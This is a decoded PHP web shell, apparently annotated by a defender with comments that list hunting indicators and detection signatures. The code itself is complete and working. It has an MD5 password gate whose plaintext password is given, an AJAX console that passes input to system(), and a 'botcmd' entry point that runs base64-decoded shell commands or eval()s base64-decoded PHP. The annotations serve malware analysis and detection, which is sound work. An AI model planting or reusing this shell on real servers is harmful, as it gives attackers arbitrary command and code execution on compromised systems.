Decoded PHP WebShell
// Operator password gate: an MD5 digest (the original author's trailing comment says it
// is the hash of "bl4ckv01d"). auth() compares md5($_POST['pwd']) against this value and,
// on success, stores that same digest in the `auth` cookie — so this literal is exactly
// what an authenticated session carries in its Cookie header, which makes it a usable
// indicator when hunting access logs or captured traffic for this shell.
$auth = "f20d65463f1f5bf4d5d87528a5e2004f"; //Hash of bl4ckv01d
// Self-URL used as the login form action and as the AJAX endpoint of the console page.
// Both components are client-supplied (Host header, request path) and are echoed into
// HTML/JS unescaped by display_auth_form() and display_interface(); the scheme is
// hard-coded to http://.
$url = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
// Renders the bare login form: a password field plus a hidden `do_auth` marker that
// auth() uses to recognise a login attempt. Nothing else is emitted (no <html>/<title>
// wrapper), so an unauthenticated request to this file answers with just this form —
// that is the page fingerprint a defender sees before authentication.
function display_auth_form() {
global $url;
?>
<form action="<?php echo $url ?>" method="post">
<input type="password" id="pwd" name="pwd">
<input type="hidden" id="do_auth" name="do_auth">
<input type="submit">
</form>
<?php
}
// Authentication gate, called unconditionally at the bottom of the file before any
// action is dispatched. Every failure path prints the login form and die()s, so the
// function only ever returns (true) on success.
//
// Two ways through:
//   1. POST carrying `do_auth` and `pwd` where md5(pwd) === $auth  -> sets cookie, returns
//   2. Cookie `auth` whose raw value === $auth                      -> returns
// The cookie is therefore a bearer token equal to the stored MD5 digest itself. No
// expiry, path, Secure or HttpOnly arguments are passed to setcookie(), and the
// comparison is a plain string compare, not hash_equals().
function auth() {
global $auth;
// Neither a session cookie nor a login attempt: show the form and stop.
if ((!isset($_COOKIE['auth'])) && (!isset($_POST['do_auth']))) {
display_auth_form();
die();
}
// Login attempt.
if (isset($_POST['do_auth'])) {
if (isset($_POST['pwd'])) {
if (md5($_POST['pwd'])===$auth) {
// Cookie value is md5(pwd), i.e. identical to $auth at this point.
setcookie("auth",md5($_POST['pwd']));
return true;
} else {
display_auth_form();
die();
}
}
// `do_auth` present but no `pwd` field.
display_auth_form();
die();
}
// Returning session: the raw cookie is compared against the digest. logout() and the
// page's JS both overwrite the cookie with "1", which fails this check.
if (isset($_COOKIE['auth']))
if ($_COOKIE['auth']===$auth) {
return true;
} else {
display_auth_form();
die();
}
}
// Operator console page, served to an authenticated browser when no `action` field is
// posted. Everything is inline (no external scripts or stylesheets):
//   - <title> echoes $_SERVER['HTTP_HOST'] unescaped; $url is echoed into the JS twice.
//   - Green-on-black styling for two elements: #cmd (text input) and #windowr (textarea).
//   - JS logout(): overwrites the cookie client-side (auth=1) and navigates to $url.
//   - JS ajaxCallback(): appends the response body to #windowr and clears #cmd.
//   - JS callAjax(): form-encoded XMLHttpRequest POST to the given url.
//   - JS handleEnter(): on Enter (keyCode 13) echoes "$ <input>" into the textarea and
//     posts `action=cmd&cmd=<urlencoded input>` to $url, which handle_cmd() serves.
// Hunting fingerprints visible here: element ids `windowr`/`cmd`, the POST body prefix
// `action=cmd&cmd=`, and the `exit` link wired to logout().
function display_interface() {
global $url;
?>
<html>
<title><?php echo $_SERVER['HTTP_HOST']; ?></title>
<style>
#windowr {
font-size: 13px;
color:#00ff00;
border:2px solid #00a000;
width:800px; height:50px;
background: #000000;
padding-left:10px;
}
#cmd {
background: #2F2F2F;
color:#00ff00;
}
</style>
<script>
function logout() {
document.cookie="auth=1;";
window.location='<?php echo $url; ?>';
}
function ajaxCallback(txt) {
var windowr = document.getElementById('windowr');
windowr.value=windowr.value+txt+'\n';
windowr.scrollTop = windowr.scrollHeight;
var cmd = document.getElementById('cmd');
cmd.value='';
}
function callAjax(url,postdata){
//var body = encodeURIComponent(postdata);
//alert(postdata); return;
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && xmlhttp.status == 200){
ajaxCallback(xmlhttp.responseText);
}
}
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(postdata);
}
function handleEnter(o,e) {
if (e.keyCode == 13) {
var cmd = document.getElementById('cmd');
var windowr = document.getElementById('windowr');
windowr.value=windowr.value+'\n$ '+cmd.value+'\n';
callAjax('<?php echo $url; ?>','action=cmd&cmd='+encodeURIComponent(cmd.value));
return false;
}
}
</script>
<body style="background: #000;">
<table width="100%" border="0" style="background: #000; color: #0f0;">
<tr width="100%">
<td width="100%">
<center>
<input type="text" id="cmd" name="cmd" style="width: 800px;" onkeydown="javascript:handleEnter(this,event);">
</center>
</td>
</tr>
<tr width="100%">
<td width="100%">
<center>
<textarea id="windowr" name="windowr" style="width: 800px; height: 800px;"></textarea>
</center>
</td>
</tr>
<tr><td><center><a href="#" onclick="javascript: logout();">exit</a></center></td></tr>
</table>
</body>
</html>
<?php
}
// Interactive command sink for `action=cmd`: the raw `cmd` POST field is handed to
// system() with stderr merged into stdout, and the output goes straight into the
// response body (the console JS appends it to #windowr). There is no validation or
// escaping; the only control in front of it is the auth() call at the bottom of the file.
// Process-tree telemetry (web server worker spawning a shell) is the natural detection.
function handle_cmd() {
system($_POST['cmd']." 2>&1");
}
// Second, non-interactive entry point (`action=botcmd`). The "bot" naming suggests an
// automated client rather than the browser console, though nothing in the file confirms
// that. Dispatches on the `cmd` field: 'code' -> eval path, 'shell' -> system path; any
// other value (or a missing `cmd`) produces no output at all.
function handle_bot_cmd() {
if (isset($_POST['cmd']))
switch($_POST['cmd']) {
case 'code':
handle_bot_cmd_code();
break;
case 'shell':
handle_bot_cmd_shell();
break;
default:
break;
}
}
// `action=botcmd&cmd=shell`: base64-decodes the `arg` POST field and runs it through
// system(). Output is captured with ob_start()/ob_get_clean() and printed as the entire
// response body. The base64 wrapper is encoding, not encryption — a captured POST body
// yields the command after a single decode, so content rules should decode `arg`
// before matching.
function handle_bot_cmd_shell() {
ob_start();
system(base64_decode($_POST['arg']));
$r=ob_get_clean();
print $r;
}
// `action=botcmd&cmd=code`: eval() of base64-decoded, attacker-supplied PHP from the
// `arg` POST field — arbitrary code execution inside the web server process, not just
// a subprocess. Output is buffered and printed as the entire response body, same as the
// shell variant. `eval(base64_decode(` is the classic static signature for this family.
function handle_bot_cmd_code() {
ob_start();
eval(base64_decode($_POST['arg']));
$r=ob_get_clean();
print $r;
}
// Server-side logout for `action=logout`: overwrites the `auth` cookie with "1" (which
// does not equal $auth, so auth() will show the form on the next request), prints a JS
// redirect back to $url, and stops. Mirrors the client-side logout() in the console JS.
function logout() {
global $url;
setcookie("auth","1");
print "<script>window.location='".$url."';</script>";
die();
}
// Entry flow: authenticate first, then either render the console (no `action` posted)
// or dispatch one of three verbs. Request-level indicators: POST fields `do_auth`/`pwd`
// (login), `action=cmd&cmd=` (console), `action=botcmd&cmd=(code|shell)&arg=<base64>`
// (automated), `action=logout`.
auth();
if (!isset($_POST['action']))
display_interface();
if (isset($_POST['action']))
switch ($_POST['action']) {
case 'cmd':
handle_cmd();
break;
case 'botcmd':
handle_bot_cmd();
break;
case 'logout':
logout();
break;
default:
// `return` at file scope ends execution of this script (or of the include of it).
return;
}